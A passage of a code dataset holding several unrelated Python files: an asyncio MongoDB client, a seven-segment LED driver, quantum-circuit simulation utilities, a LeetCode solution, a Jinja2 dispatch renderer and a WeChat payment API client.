isinstance(password, str):\n raise TypeError(\"password must be an instance of str\")\n # First get the nonce\n result = yield from self[\"$cmd\"].find_one({\"getnonce\": 1})\n return (yield from self.authenticate_with_nonce(result, name, password))\n\n @asyncio.coroutine\n def authenticate_with_nonce(self, result, name, password):\n nonce = result['nonce']\n key = auth._auth_key(nonce, name, password)\n # hacky because order matters\n auth_command = SON(authenticate=1)\n auth_command['user'] = name\n auth_command['nonce'] = nonce\n auth_command['key'] = key\n # Now actually authenticate\n result = yield from self[\"$cmd\"].find_one(auth_command)\n return self.authenticated(result)\n\n @asyncio.coroutine\n def authenticated(self, result):\n \"\"\"might want to just call callback with 0.0 instead of errback\"\"\"\n ok = result['ok']\n if ok:\n return ok\n else:\n raise errors.PyMongoError(result['errmsg'])\n\n\nclass Connection(object):\n \"\"\"\n Wrapper around the protocol and transport which takes care of establishing\n the connection and reconnecting it.\n connection = yield from Connection.create(host='localhost', port=6379)\n result = yield from connection.set('key', 'value')\n \"\"\"\n protocol = _Protocol\n \"\"\"\n The :class:`_Protocol` class to be used this connection.\n \"\"\"\n\n @classmethod\n @asyncio.coroutine\n def create(cls, host='localhost', port=27017, loop=None, auto_reconnect=False):\n connection = cls()\n connection.host = host\n connection.port = port\n connection._loop = loop\n connection._retry_interval = .5\n # Create protocol instance\n protocol_factory = type('_Protocol', (cls.protocol,), {})\n if auto_reconnect:\n class protocol_factory(protocol_factory):\n def connection_lost(self, exc):\n super().connection_lost(exc)\n asyncio.Task(connection._reconnect())\n\n connection.protocol = protocol_factory()\n # Connect\n yield from connection._reconnect()\n return connection\n\n @asyncio.coroutine\n def disconnect(self):\n if self.transport:\n return self.transport.close()\n\n @property\n def transport(self):\n \"\"\" The transport instance that the protocol is currently using. \"\"\"\n return self.protocol.transport\n\n def _get_retry_interval(self):\n \"\"\" Time to wait for a reconnect in seconds. \"\"\"\n return self._retry_interval\n\n def _reset_retry_interval(self):\n \"\"\" Set the initial retry interval. \"\"\"\n self._retry_interval = .5\n\n def _increase_retry_interval(self):\n \"\"\" When a connection failed. Increase the interval.\"\"\"\n self._retry_interval = min(60, 1.5 * self._retry_interval)\n\n def _reconnect(self):\n \"\"\"\n Set up Mongo connection.\n \"\"\"\n loop = self._loop or asyncio.get_event_loop()\n while True:\n try:\n # print('connecting...')\n yield from loop.create_connection(lambda: self.protocol, self.host, self.port)\n self._reset_retry_interval()\n return\n except OSError:\n # Sleep and try again\n self._increase_retry_interval()\n interval = self._get_retry_interval()\n print('Connecting to mongo failed. Retrying in %i seconds' % interval)\n yield from asyncio.sleep(interval)\n\n def __getitem__(self, database_name):\n return Database(self.protocol, database_name)\n\n def __getattr__(self, database_name):\n return self[database_name]\n\n def __repr__(self):\n return 'Connection(host=%r, port=%r)' % (self.host, self.port)\n\n\n\nclass Pool(object):\n \"\"\"\n Pool of connections. Each Takes care of setting up the connection and connection pooling.\n When pool_size > 1 and some connections are in use because of \n transactions or blocking requests, the other are preferred.\n pool = yield from Pool.create(host='localhost', port=6379, pool_size=10)\n result = yield from connection.set('key', 'value')\n \"\"\"\n\n protocol = _Protocol\n \"\"\" The :class:`_Protocol` class to be used for each connection in this pool. \"\"\"\n\n @classmethod\n def get_connection_class(cls):\n \"\"\" Return the :class:`Connection` class to be used for every connection in\n this pool. Normally this is just a ``Connection`` using the defined ``protocol``\n \"\"\"\n class ConnectionClass(Connection):\n protocol = cls.protocol\n return ConnectionClass\n\n @classmethod\n @asyncio.coroutine\n def create(cls, host='localhost', port=27017, loop=None, poolsize=1, auto_reconnect=True):\n \"\"\" Create a new pool instance. \"\"\"\n self = cls()\n self._host = host\n self._port = port\n self._pool_size = poolsize\n\n # Create connections\n self._connections = []\n\n for i in range(poolsize):\n connection_class = cls.get_connection_class()\n connection = yield from connection_class.create(host=host, port=port, loop=loop,\n auto_reconnect=auto_reconnect)\n self._connections.append(connection)\n\n return self\n\n def __repr__(self):\n return 'Pool(host=%r, port=%r, pool_size=%r)' % (self._host, self._port, self._poolsize)\n\n @property\n def pool_size(self):\n \"\"\" Number of parallel connections in the pool.\"\"\"\n return self._poolsize\n\n @property\n def connections_connected(self):\n \"\"\"\n The amount of open TCP connections.\n \"\"\"\n return sum([1 for c in self._connections if c.protocol.is_connected])\n\n def close(self):\n for conn in self._connections:\n conn.disconnect()\n\n def _get_free_connection(self):\n \"\"\"\n Return the next protocol instance that's not in use.\n (A protocol in pubsub mode or doing a blocking request is considered busy,\n and can't be used for anything else.)\n \"\"\"\n self._shuffle_connections()\n for c in self._connections:\n if c.protocol.is_connected:\n return c\n\n def _shuffle_connections(self):\n \"\"\"\n 'shuffle' protocols. Make sure that we divide the load equally among the protocols.\n \"\"\"\n self._connections = self._connections[1:] + self._connections[:1]\n\n def __getattr__(self, name):\n \"\"\"\n Proxy to a protocol. (This will choose a protocol instance that's not\n busy in a blocking request or transaction.)\n \"\"\"\n if 'close' == name:\n return self.close\n connection = self._get_free_connection()\n\n if connection:\n return getattr(connection, name)\n else:\n raise errors.PyMongoError('No available connections in the pool: size=%s, connected=%s' % \n (self.pool_size, self.connections_connected))\n return None\n\n\n\n@asyncio.coroutine\ndef test():\n from pprint import pprint\n mc = yield from Connection.create(host='127.0.0.1', port=27017)\n doc = yield from mc.local.startup_log.find_one()\n pprint(doc)\n yield from mc.disconnect()\n\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n loop.run_until_complete(test())\n\n\n\n\n","sub_path":"magic3/asyncs/mongoclient.py","file_name":"mongoclient.py","file_ext":"py","file_size_in_byte":32052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"263322648","text":"#! /usr/bin/python\n#\n# sudo python sevenseg_i2c.py -- display number\n# sudo python sevenseg_i2c.py -- display text(very limited)\n# sudo python sevenseg_i2c.py -- count to 200\n#\n# Outputs decimal numbers to AdaFruit LED Backback 7 Segment display\n#\n# i2c must be enabled on the raspberry pi. If you don't see /dev/i2c-1 this\n# code can't work. \n# Link from your current directory to the following driver files cloned from\n# https://github.com/adafruit/Adafruit-Raspberry-Pi-Python-Code:\n# Adafruit_I2C.py\n# Adafruit_7Segment.py\n# Adafruit_LEDBackpack.py\n\nimport sevenseg\n\nimport sys\nimport time\n\nfrom Adafruit_7Segment import SevenSegment\n\nclass SevenSegDisplay:\n\n def __init__(self, num_digits=4, address=0x70):\n self.num_digits = num_digits\n self.digit = 0\n self.seg = SevenSegment(address)\n\n def setup(self):\n return None\n\n def cleanup(self):\n return None\n\n def start(self):\n self.digit = 0\n\n def latch(self):\n return None\n\n def send_raw(self, segments):\n self.seg.writeDigitRaw(self.digit, segments)\n self.digit += 1\n # digits 2 is the colon, skip \n if self.digit == 2:\n self.digit += 1\n\n def output(self, value):\n \"\"\" Outputs a string or a integer number onto 7-segment display.\"\"\"\n raw = sevenseg.text(value, self.num_digits)\n self.start()\n for c in raw:\n self.send_raw(c)\n\n def blank(self):\n \"\"\" Blanks the display (all LED off). \"\"\"\n raw = sevenseg.blanks(self.num_digits)\n self.start()\n for c in raw:\n self.send_raw(c)\n\ndef main():\n \"\"\" Simple test: drive one or more displays \"\"\"\n args=sys.argv\n\n if len(args) < 2:\n # count on the first display\n display = SevenSegDisplay()\n display.setup()\n for num in range(0,200):\n display.start()\n display.output(num)\n display.latch()\n time.sleep(0.1)\n display.cleanup()\n else:\n # show values across multipel displays\n address = 0x70\n displays = []\n for value in args[1:]:\n displays += [SevenSegDisplay(address = address)]\n address += 1\n count = 1\n displays[0].start()\n for d in displays: \n d.output(args[count])\n count += 1\n displays[0].latch()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"client/sevenseg_i2c.py","file_name":"sevenseg_i2c.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"324839278","text":"#!/usr/bin/env python3\n\nimport sys\nfrom ..format.parameter_type import scalar,matrix\nfrom .generator import generators\nfrom ..color_print import Error\n\nclass independent_scalar(scalar,generators):\n def __init__(self,name,block,code\n ,minimum=None,maximum=None,value=None\n ,strategy='random'\n ,prior_distribution='uniform'\n ,**args\n ):\n super().__init__(name,block,code,value)\n self.minimum=minimum\n self.maximum=maximum\n self.value=value\n self.strategy=strategy\n self.prior_distribution=prior_distribution\n\n self.check(**args)\n self.Generate=getattr(self,prior_distribution)\n def print(self,out=None):\n if out is None:\n out=sys.stdout\n out.write('\\t%s\\t%f\\n'%(self.name,self.value))\n\n def check(self,**args):\n if self.strategy=='random':\n if any([ getattr(self,i) is None for i in ('minimum','maximum')]):\n Error('unknown bounds of parameter %s '%self.name)\n else:\n Error('Unknown strategy: %s'%self.strategy)\n\nclass follower(scalar):\n def __init__(self,name,block,code,target):\n super().__init__(name,block,code)\n self.target=target\n def Generate(self):\n self.value=self.target.value\n\nclass independent_element(independent_scalar):\n pass\n\n\nclass independent_matrix(matrix,generators):\n def __init__(self, name, block, shape = None, value = None, free_element_list=None):\n super().__init__(name, block, shape, value)\n self.free_elements={}\n self.follower_elements={}","sub_path":"ScanCraft/command/scan/free_parameter.py","file_name":"free_parameter.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"615632408","text":"import numpy as np\nimport tncontract as tn\nimport qutip as qt\nfrom itertools import product\nfrom functools import reduce\n\ndef local_operator(site, local, n_sites):\n \"\"\"\n Simple Local operator function taking a site, the local gate and the number of sites\n \"\"\"\n I = qt.qeye(2)\n width = len(local.dims[0])\n if (site + width > (n_sites)):\n raise ValueError(\"n_sites should be >= site + locality ({} > {})\".format(site+width, n_sites))\n return reduce(qt.tensor, [I for _ in range(site)] + [local] + [I for _ in range(site+width,n_sites)])\n\ndef k_site_paulis(k):\n \"\"\"\n Returns the k-site Pauli operators\n \"\"\"\n paulis = [p/np.sqrt(2) for p in [qt.qeye(2),qt.sigmax(),qt.sigmay(),qt.sigmaz()]]\n r = tuple([range(4) for _ in range(int(k))])\n return [qt.tensor([paulis[i] for i in ranges]) for ranges in product(*r)]\n\ndef ptm_to_super(G):\n \"\"\"\n Converts a PTM to the corresponding superoperator in the computational basis\n \"\"\"\n n = int(np.log2(G.shape[0])/2.)\n paulis = k_site_paulis(n)\n # Pauli change of basis matrix (already normalised)\n T = np.array([p.full().reshape(-1) for p in paulis])\n # check if G is a ket\n if G.shape[1] == 1:\n return np.conj(T.T) @ G\n else:\n return np.conj(T.T) @ G @ T\n\nfrom copy import deepcopy\n\n\"\"\"\nSingle-qubit gates\n\"\"\"\n\n\ndef single_qubit_gate(theta, phi):\n \"\"\"\n Return a single-qubit unitary gate with angles theta and phi.\n \"\"\"\n gate = np.array([\n [np.cos(theta / 2), -1j * np.exp(-1j * phi) * np.sin(theta / 2)],\n [-1j * np.exp(1j * phi) * np.sin(theta / 2), np.cos(theta / 2)]\n ])\n return tn.Tensor(gate.reshape(2, 2, 1, 1), ['physout', 'physin', 'left', 'right'])\n\n\ndef single_qubit_gate_layer(n_sites, angles):\n \"\"\"\n Return an MPO with single-qubit gates along the chain.\n Parameters\n ----------\n n_sites : int\n angles: list\n List of tuples containing the single qubit rotation angles. Each site\n needs (\\theta_i, \\phi_i).\n \"\"\"\n mpo = [single_qubit_gate(*site_angles) for site_angles in angles]\n return tn.onedim.MatrixProductOperator(mpo)\n\n\ndef random_single_qubit_gate_layer(n_sites):\n \"\"\"\n Return an MPO with random-angled single-qubit gates along the chain.\n Parameters\n ----------\n n_sites : int\n \"\"\"\n angles = [(2 * np.pi * np.random.rand(), 2 * np.pi * np.random.rand()) for _ in range(n_sites)]\n return single_qubit_gate_layer(n_sites, angles)\n\n\ndef random_single_qubit_layer_qutip(n_qubits):\n operators = []\n for n in range(n_qubits):\n operators.append(qt.rand_unitary(2))\n return qt.to_super(qt.tensor(operators))\n\n\n\"\"\"\nTwo-qubit gates\n\"\"\"\n\n\ndef two_qubit_ms_gate(theta):\n \"\"\"\n Return a two-qubit Molmer-Sorenson gate with angle theta.\n \"\"\"\n gate = qt.operations.molmer_sorensen(theta, 2).full()\n\n # Turn the gate into Tensor with physical and virtual bonds.\n gate_tensor = tn.Tensor(gate.reshape(4, 4, 1, 1), ['physout', 'physin', 'left', 'right'])\n\n # Split physical bonds into single-qubit sites.\n gate_tensor.split_index('physout', (2, 2), ['physout_1', 'physout_2'])\n gate_tensor.split_index('physin', (2, 2), ['physin_1', 'physin_2'])\n\n # SVD cut the two-qubit gate into small 2-site MPO.\n U, V = tn.tensor_svd(gate_tensor, row_labels=['physout_1', 'physin_1', 'left'], absorb_singular_values='left')\n U.replace_label(['physout_1', 'physin_1', 'svd_in'], ['physout', 'physin', 'right'])\n V.replace_label(['physout_2', 'physin_2', 'svd_out'], ['physout', 'physin', 'left'])\n return [U, V]\n\ndef two_qubit_gate_layer_qutip(n_sites, thetas, left=0):\n \"\"\"\n Return an MPO with Molmer-Sorenson gates along the chain.\n Parameters\n ----------\n n_sites : int\n thetas: list\n list of MS gate angles\n left : int\n left determines wether the two qubit gates begin from\n qubit 0 or 1. For example, to make ladder circuits\n \"\"\"\n if left != 0 and left != 1:\n raise ValueError(\"left={}. Can only take the value 0 or 1\".format(left))\n\n id = qt.qeye(2)\n gates = [qt.operations.molmer_sorensen(theta) for theta in thetas]\n\n if n_sites % 2 == 0:\n if left == 0:\n return qt.to_super(reduce(qt.tensor, gates))\n else:\n # Pads identities on each end of the chain\n return qt.to_super(reduce(qt.tensor, [id] + gates + [id]))\n else:\n if left == 0:\n # Put an identity tensor at end qubit\n return qt.to_super(reduce(qt.tensor, gates + [id]))\n else:\n # Put an identity tensor on the first qubit.\n return qt.to_super(reduce(qt.tensor, [id] + gates))\n\ndef two_qubit_gate_layer(n_sites, thetas, left=0):\n \"\"\"\n Return an MPO with Molmer-Sorenson gates along the chain.\n Parameters\n ----------\n n_sites : int\n thetas: list\n list of MS gate angles\n left : int\n left determines wether the two qubit gates begin from\n qubit 0 or 1. For example, to make ladder circuits\n \"\"\"\n if left != 0 and left != 1:\n raise ValueError(\"left={}. Can only take the value 0 or 1\".format(left))\n\n id_tensor = tn.Tensor(np.eye(2).reshape(2, 2, 1, 1), ['physout', 'physin', 'left', 'right'])\n mpo = []\n for theta in thetas:\n mpo += two_qubit_ms_gate(theta)\n\n if n_sites % 2 == 0:\n if left == 0:\n return tn.onedim.MatrixProductOperator(mpo)\n else:\n # Pads identities on each end of the chain\n return tn.onedim.MatrixProductOperator([id_tensor] + mpo + [id_tensor])\n else:\n if left == 0:\n # Put an identity tensor at end qubit\n return tn.onedim.MatrixProductOperator(mpo + [id_tensor])\n else:\n # Put an identity tensor on the first qubit.\n return tn.onedim.MatrixProductOperator([id_tensor] + mpo)\n\ndef random_two_qubit_gate_layer_qutip(n_sites, left=0):\n \"\"\"\n Return an MPO with random-angled Molmer-Sorenson gates along the chain.\n Parameters\n ----------\n n_sites : int\n left : int\n If n_sites is an odd number, left determines wether the two qubit gates begin from\n qubit 0 (aligned left) or 1 (aligned right).\n \"\"\"\n if n_sites % 2 == 0 and left == 1:\n # This is case where we need to pad identities at the ends of the chain.\n n_gates = int((n_sites - 1) / 2)\n else:\n n_gates = int(np.floor(n_sites / 2))\n thetas = 2 * np.pi * np.random.rand(n_gates)\n return two_qubit_gate_layer_qutip(n_sites, thetas, left=left)\n\ndef random_two_qubit_gate_layer(n_sites, left=0):\n \"\"\"\n Return an MPO with random-angled Molmer-Sorenson gates along the chain.\n Parameters\n ----------\n n_sites : int\n left : int\n If n_sites is an odd number, left determines wether the two qubit gates begin from\n qubit 0 (aligned left) or 1 (aligned right).\n \"\"\"\n if n_sites % 2 == 0 and left == 1:\n # This is case where we need to pad identities at the ends of the chain.\n n_gates = int((n_sites - 1) / 2)\n else:\n n_gates = int(np.floor(n_sites / 2))\n thetas = 2 * np.pi * np.random.rand(n_gates)\n return two_qubit_gate_layer(n_sites, thetas, left=left)\n\ndef random_two_qubit_gate_ladder_qutip(n_sites):\n \"\"\"\n Return a random two-qubit ladder circuit in the form of two MPOs.\n Parameters\n ----------\n n_sites : int\n \"\"\"\n if n_sites <= 2:\n raise ValueError(\"Must have more than 2 qubits to form a ladder circuit (n_sites={}).\".format(n_sites))\n layer_1 = random_two_qubit_gate_layer_qutip(n_sites, left=0)\n layer_2 = random_two_qubit_gate_layer_qutip(n_sites, left=1)\n return layer_1, layer_2\n\ndef random_two_qubit_gate_ladder(n_sites):\n \"\"\"\n Return a random two-qubit ladder circuit in the form of two MPOs.\n Parameters\n ----------\n n_sites : int\n \"\"\"\n if n_sites <= 2:\n raise ValueError(\"Must have more than 2 qubits to form a ladder circuit (n_sites={}).\".format(n_sites))\n layer_1 = random_two_qubit_gate_layer(n_sites, left=0)\n layer_2 = random_two_qubit_gate_layer(n_sites, left=1)\n return layer_1, layer_2\n\n\n\"\"\"\nNoise models\n\"\"\"\n\n\ndef depolarising_channel(p):\n \"\"\"\n Return the superoperator for a depolarising channel.\n \"\"\"\n return qt.kraus_to_super([\n np.sqrt(1 - 3.*p/4.) * qt.qeye(2),\n np.sqrt(p/4.) * qt.sigmax(),\n np.sqrt(p/4.) * qt.sigmay(),\n np.sqrt(p/4.) * qt.sigmaz()\n ])\n\n\ndef bit_flip_layer(p, n_sites):\n \"\"\"\n Return a circuit layer where each site experiences a bit-flip error with\n probability p.\n \"\"\"\n x_error = tn.Tensor(\n qt.sigmax().full().reshape(2, 2, 1, 1),\n ['physout', 'physin', 'left', 'right']\n )\n id_tensor = tn.Tensor(\n np.eye(2).reshape(2, 2, 1, 1),\n ['physout', 'physin', 'left', 'right']\n )\n return tn.onedim.MatrixProductOperator(\n [x_error if error_site else id_tensor for error_site in np.random.binomial(1, p, n_sites)]\n )\n\n\n\"\"\"\nOther tools\n\"\"\"\n\n\ndef output_probabilities(psi):\n \"\"\"\n Extract the probabilities for obtaining each output of a quantum circuit.\n \"\"\"\n psi_copy = deepcopy(psi)\n psi_copy.left_canonise(normalise=True)\n psi_vec = tn.onedim.contract_virtual_indices(psi_copy)\n psi_vec.fuse_indices('physout', 'physout')\n probs = abs(psi_vec.data.reshape(-1, 1)) ** 2\n return probs\n","sub_path":"Week1_Trapped_Ions/src/simulation_utils.py","file_name":"simulation_utils.py","file_ext":"py","file_size_in_byte":9566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"553037225","text":"# 115. 不同的子序列\n\n\n# 给定一个字符串 S 和一个字符串 T,计算在 S 的子序列中 T 出现的个数。\n\n# 一个字符串的一个子序列是指,通过删除��些(也可以不删除)字符且不干扰剩余字符相对位置所组成的新字符串。(例如,\"ACE\" 是 \"ABCDE\" 的一个子序列,而 \"AEC\" 不是)\n\n# 示例 1:\n\n# 输入: S = \"rabbbit\", T = \"rabbit\"\n# 输出: 3\n# 解释:\n\n# 如下图所示, 有 3 种可以从 S 中得到 \"rabbit\" 的方案。\n# (上箭头符号 ^ 表示选取的字母)\n\n# rabbbit\n# ^^^^ ^^\n# rabbbit\n# ^^ ^^^^\n# rabbbit\n# ^^^ ^^^\n# 示例 2:\n\n# 输入: S = \"babgbag\", T = \"bag\"\n# 输出: 5\n# 解释:\n\n# 如下图所示, 有 5 种可以从 S 中得到 \"bag\" 的方案。 \n# (上箭头符号 ^ 表示选取的字母)\n\n# babgbag\n# ^^ ^\n# babgbag\n# ^^ ^\n# babgbag\n# ^ ^^\n# babgbag\n# ^ ^^\n# babgbag\n# ^^^\n\n\n\n\n\nclass Solution(object):\n def numDistinct(self, s, t):\n \"\"\"\n :type s: str\n :type t: str\n :rtype: int\n \"\"\"\n \n ways = [0 for _ in xrange(len(t) + 1)]\n ways[0] = 1\n for S_char in s:\n for j, T_char in reversed(list(enumerate(t))):\n if S_char == T_char:\n ways[j + 1] += ways[j]\n return ways[len(t)]\n \n \n \n","sub_path":"Python/115.py","file_name":"115.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"25501532","text":"\"\"\"Render dispatches from templates.\n\"\"\"\n\nimport logging\n\nimport toml\nimport jinja2\nimport bbcode\n\nfrom meguca import exceptions\nfrom meguca.plugins.src.dispatch_updater import bb_parser\nfrom meguca.plugins.src.dispatch_updater import utils\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass CustomVars():\n \"\"\"Custom variables.\n\n Args:\n custom_vars_path (str|list): Custom vars files.\n \"\"\"\n\n def __init__(self, custom_vars_path):\n self._custom_vars = {}\n\n if isinstance(custom_vars_path, list):\n for custom_vars_file in custom_vars_path:\n self.load_custom_vars(custom_vars_file)\n elif custom_vars_path == '':\n logger.debug('No custom vars file found')\n else:\n self.load_custom_vars(custom_vars_path)\n\n def load_custom_vars(self, custom_vars_file):\n \"\"\"Load custom vars from files\n\n Args:\n custom_vars_file (str): Custom vars file name\n \"\"\"\n\n try:\n self._custom_vars.update(toml.load(custom_vars_file))\n logger.debug('Loaded custom vars file \"%s\"', custom_vars_file)\n except FileNotFoundError:\n raise FileNotFoundError('Custom vars file \"%s\" not found'.format(custom_vars_file))\n\n @property\n def custom_vars(self):\n return self._custom_vars\n\n\nclass TemplateRenderer():\n \"\"\"Render a dispatch template.\n\n Args:\n template_dir_path (str): Template file directory.\n filters_path (str): Path to filters file.\n template_ext (str): Template file extension.\n \"\"\"\n\n def __init__(self, template_dir_path, filters_path, template_ext):\n if template_dir_path is None:\n raise exceptions.PluginError('Dispatch template directory path not configured!')\n template_loader = jinja2.FileSystemLoader(template_dir_path)\n # Make access to undefined context variables generate logs.\n undef = jinja2.make_logging_undefined(logger=logger)\n self.env = jinja2.Environment(loader=template_loader, trim_blocks=True, undefined=undef)\n self.template_ext = template_ext\n\n if filters_path is not None:\n filters = utils.get_funcs(filters_path)\n if filters is None:\n logger.warning('Filter file not found!')\n else:\n loaded_filters = {}\n for filter in filters:\n loaded_filters[filter[0]] = filter[1]\n logger.debug('Loaded filter \"%s\"', filter[0])\n self.env.filters.update(loaded_filters)\n logger.info('Loaded all custom filters')\n\n def validate_templates(self):\n \"\"\"Validate syntax and existence of templates.\n \"\"\"\n\n for template in self.env.list_templates(extensions=self.template_ext):\n try:\n self.env.get_template(template)\n except jinja2.TemplateSyntaxError as e:\n logger.error('Dispatch template \"%s\" syntax error at line %d: %s',\n template, e.lineno, e.message)\n\n def render(self, name, context):\n \"\"\"Render a dispatch template.\n\n Args:\n name (str): Dispatch template name.\n context (dict): Context for the template.\n\n Returns:\n str: Rendered template.\n \"\"\"\n\n template_path = '{}.{}'.format(name, self.template_ext)\n return self.env.get_template(template_path).render(context)\n\n\nclass Renderer():\n \"\"\"Render dispatches from templates and process custom BBcode tags.\n\n Args:\n config: Configuration.\n \"\"\"\n\n def __init__(self, config):\n template_config = config.get('template', {})\n self.template_renderer = TemplateRenderer(template_config.get('template_dir_path', None),\n template_config.get('filters_path', None),\n template_config.get('template_file_ext', None))\n\n bb_config = config.get('bbcode', {})\n self.bb_parser = bb_parser.BBParser(bb_config.get('simple_formatter_path', None),\n bb_config.get('complex_formatter_path', None),\n bb_config.get('complex_formatter_config_path', None))\n\n custom_vars = CustomVars(config.pop('custom_vars_path', None))\n\n # Context for templates\n self.ctx = custom_vars.custom_vars\n\n def update_ctx(self, data, plg_config, ext_config, dispatch_info):\n \"\"\"Update context with new info.\n\n Args:\n data (dict): New data.\n plg_config (dict): Our plugin's configuration.\n config (dict): Meguca and other plugins' configuration.\n dispatch_info (dict): Dispatch information.\n \"\"\"\n\n self.ctx.update({'data_products': data, 'config': plg_config,\n 'ext_config': ext_config, 'dispatch_info': dispatch_info})\n\n def render(self, name):\n \"\"\"Render a dispatch.\n\n Args:\n name (str): Dispatch file name.\n\n Returns:\n str: Rendered dispatch.\n \"\"\"\n\n self.ctx['current_dispatch'] = {'name': name}\n self.ctx['current_dispatch'].update(self.ctx['dispatch_info'][name])\n\n rendered = self.template_renderer.render(name, self.ctx)\n rendered = self.bb_parser.format(rendered, **self.ctx)\n\n logger.debug('Rendered dispatch \"%s\"', name)\n\n return rendered\n","sub_path":"meguca/plugins/src/dispatch_updater/dispatch_renderer.py","file_name":"dispatch_renderer.py","file_ext":"py","file_size_in_byte":5503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"188252859","text":"# coding: utf-8\nimport logging\nimport requests\nimport rsa\nimport os\nimport base64\nimport json as json_pkg\nfrom hashlib import md5, sha1\nfrom pickle import dumps, loads\n\nfrom Crypto.Cipher import PKCS1_OAEP\nfrom Crypto.PublicKey import RSA\n\nfrom werobot.client import Client, time\nfrom werobot.utils import generate_token\n\nfrom requests.compat import json as _json\n\nfrom django.conf import settings\n\nfrom management.utils.util import dict_parse_from_xml\nfrom management.utils.redis_db import redis\n\n# 获取jsticket\nJSTICKET_URI = 'https://api.weixin.qq.com/cgi-bin/ticket/getticket'\n# 参数微信js config签名url\nJSPARAMS_URI = 'http://mp.weixin.qq.com?params=value'\n# 统一支付接口\nJSPAY_URI = 'https://api.mch.weixin.qq.com/pay/unifiedorder'\n# 企业付款到银行卡\nPAY_BANK_URI = 'https://api.mch.weixin.qq.com/mmpaysptrans/pay_bank'\n# RSA public key\nPUBLIC_KEY_URI = 'https://fraud.mch.weixin.qq.com/risk/getpublickey'\n# pay to promotion\nPROMOTION_TRANSFERS_URI = \"https://api.mch.weixin.qq.com/mmpaymkttransfers/promotion/transfers\"\n# query bank uri\nQUERY_BANK_URI = \"https://api.mch.weixin.qq.com/mmpaysptrans/query_bank\"\n# query transfer uri\nQUERY_TRANSFER_INFO_URI = \"https://api.mch.weixin.qq.com/mmpaymkttransfers/gettransferinfo\"\n\nBASE_PATH = os.path.dirname(os.path.abspath(__file__))\nPUBLIC_PEM = os.path.join(\"\", BASE_PATH, \"pem\", settings.PROJECT_NAME, \"public.pem\")\n\nAPICLIENT_CERT = os.path.join(\"/\", BASE_PATH, \"pem\", settings.PROJECT_NAME, \"apiclient_cert.pem\")\nAPICLIENT_KEY = os.path.join(\"/\", BASE_PATH, \"pem\", settings.PROJECT_NAME, \"apiclient_key.pem\")\n\n# 接口查询\nORDER_QUERY = \"https://api.mch.weixin.qq.com/pay/orderquery\"\nlogger = logging.getLogger('sdk')\n\n\ndef get_sign(kwargs, sign_type='MD5', pay_sign_key=None, is_upper=True):\n \"\"\"\n 微信签名参数组装\n @param: params 参与签名的参数\n @param: sign_type 签名类型\n @param: pay_sign_key 是否需要支付密钥\n @return: sign, sign_type\n \"\"\"\n # 根据ascii码进行排序\n print(kwargs, 'kwargs')\n params = list(kwargs.items())\n params.sort()\n # urle拼接\n string = \"&\".join([\"%s=%s\" % (str(p[0]), str(p[1])) for p in params])\n if pay_sign_key:\n string += \"&key=%s\" % pay_sign_key\n print(string, 'string')\n string = bytes(string, \"UTF-8\")\n # 生成签名 Point: 这里签名时间戳,必须与wxconfig中得时间戳一致---坑呀\n sign = \"\"\n if sign_type == \"MD5\":\n sign = md5(string).hexdigest().upper() if is_upper else md5(string).hexdigest()\n if sign_type == \"SHA1\":\n sign = sha1(string).hexdigest().upper() if is_upper else sha1(string).hexdigest()\n return sign, sign_type\n\n\nclass PayException(Exception):\n pass\n\n\nclass PayClient(Client):\n def __init__(self, appid, appserect):\n # werobot 更新\n config = {'APP_ID': appid, 'APP_SECRET': appserect}\n super(PayClient, self).__init__(config)\n self.js_ticket = None\n self.js_express = None\n self.pay_sign_key = settings.WECHAT_API_KEY\n self.partner_id = settings.WECHAT_PARTNER_ID\n self.line_url = \"weixin://wxpay/bizpayurl?sign={sign}&appid={appid}&mch_id={mch_id}&product_id={product_id}&\" \\\n \"time_stamp={time_stamp}&nonce_str={nonce_str}\"\n\n @property\n def _now_time(self):\n return int(time.time())\n\n def partner_trade_no(self, extra_code):\n return \"{}{}\".format(str(self._now_time), extra_code)\n\n def signature(self, string):\n \"\"\"\n 公钥加密,提现到银行卡, 签名.\n \"\"\"\n # 读取pem public key文件\n logger.info('PUBLIC_PEM: {}'.format(PUBLIC_PEM))\n with open(PUBLIC_PEM, 'rb') as publickey_file:\n pub = publickey_file.read()\n # 加密\n publickey = RSA.importKey(pub)\n cipher = PKCS1_OAEP.new(publickey)\n\n signature = cipher.encrypt(string.encode(\"utf-8\"))\n signature_base64 = base64.b64encode(signature).decode('utf-8')\n return signature_base64\n\n def request(self, method, url, **kwargs):\n if isinstance(kwargs.get(\"data\", \"\"), dict):\n body = _json.dumps(kwargs[\"data\"], ensure_ascii=False)\n body = body.encode('utf8')\n kwargs[\"data\"] = body\n\n verify = kwargs.pop(\"verify\", True)\n r = requests.request(\n method=method,\n url=url,\n verify=verify,\n **kwargs\n )\n r.raise_for_status()\n # 根据返回格式转换成json\n try:\n json = r.json()\n logger.info(\"json: {}\".format(json))\n except ValueError:\n logger.info(\"content: {}\".format(str(r.content, \"utf-8\")))\n json = dict_parse_from_xml(r.content)\n logger.info(\"content json: {}\".format(json))\n return json\n\n def get_access_token(self):\n \"\"\"\n 判断现有的token是否过期。\n 用户需要多进程或者多机部署可以手动重写这个函数\n 来自定义token的存储,刷新策略。\n :return: 返回token\n \"\"\"\n key_access_token = \"pay_client_access_token\"\n stream = redis.get(key_access_token)\n if stream:\n self._token, self.token_expires_at = loads(stream)\n\n if self._token:\n now = time.time()\n if self.token_expires_at - now > 480:\n logger.info(\"exipres ticket: {}\".format(self.token_expires_at - now))\n return self._token\n\n json = self.grant_token()\n self._token = json[\"access_token\"]\n self.token_expires_at = int(time.time()) + json[\"expires_in\"]\n # set\n redis.set(key_access_token, dumps([self._token, self.token_expires_at]))\n return self._token\n\n def grant_js_ticket(self):\n \"\"\"\n 获取 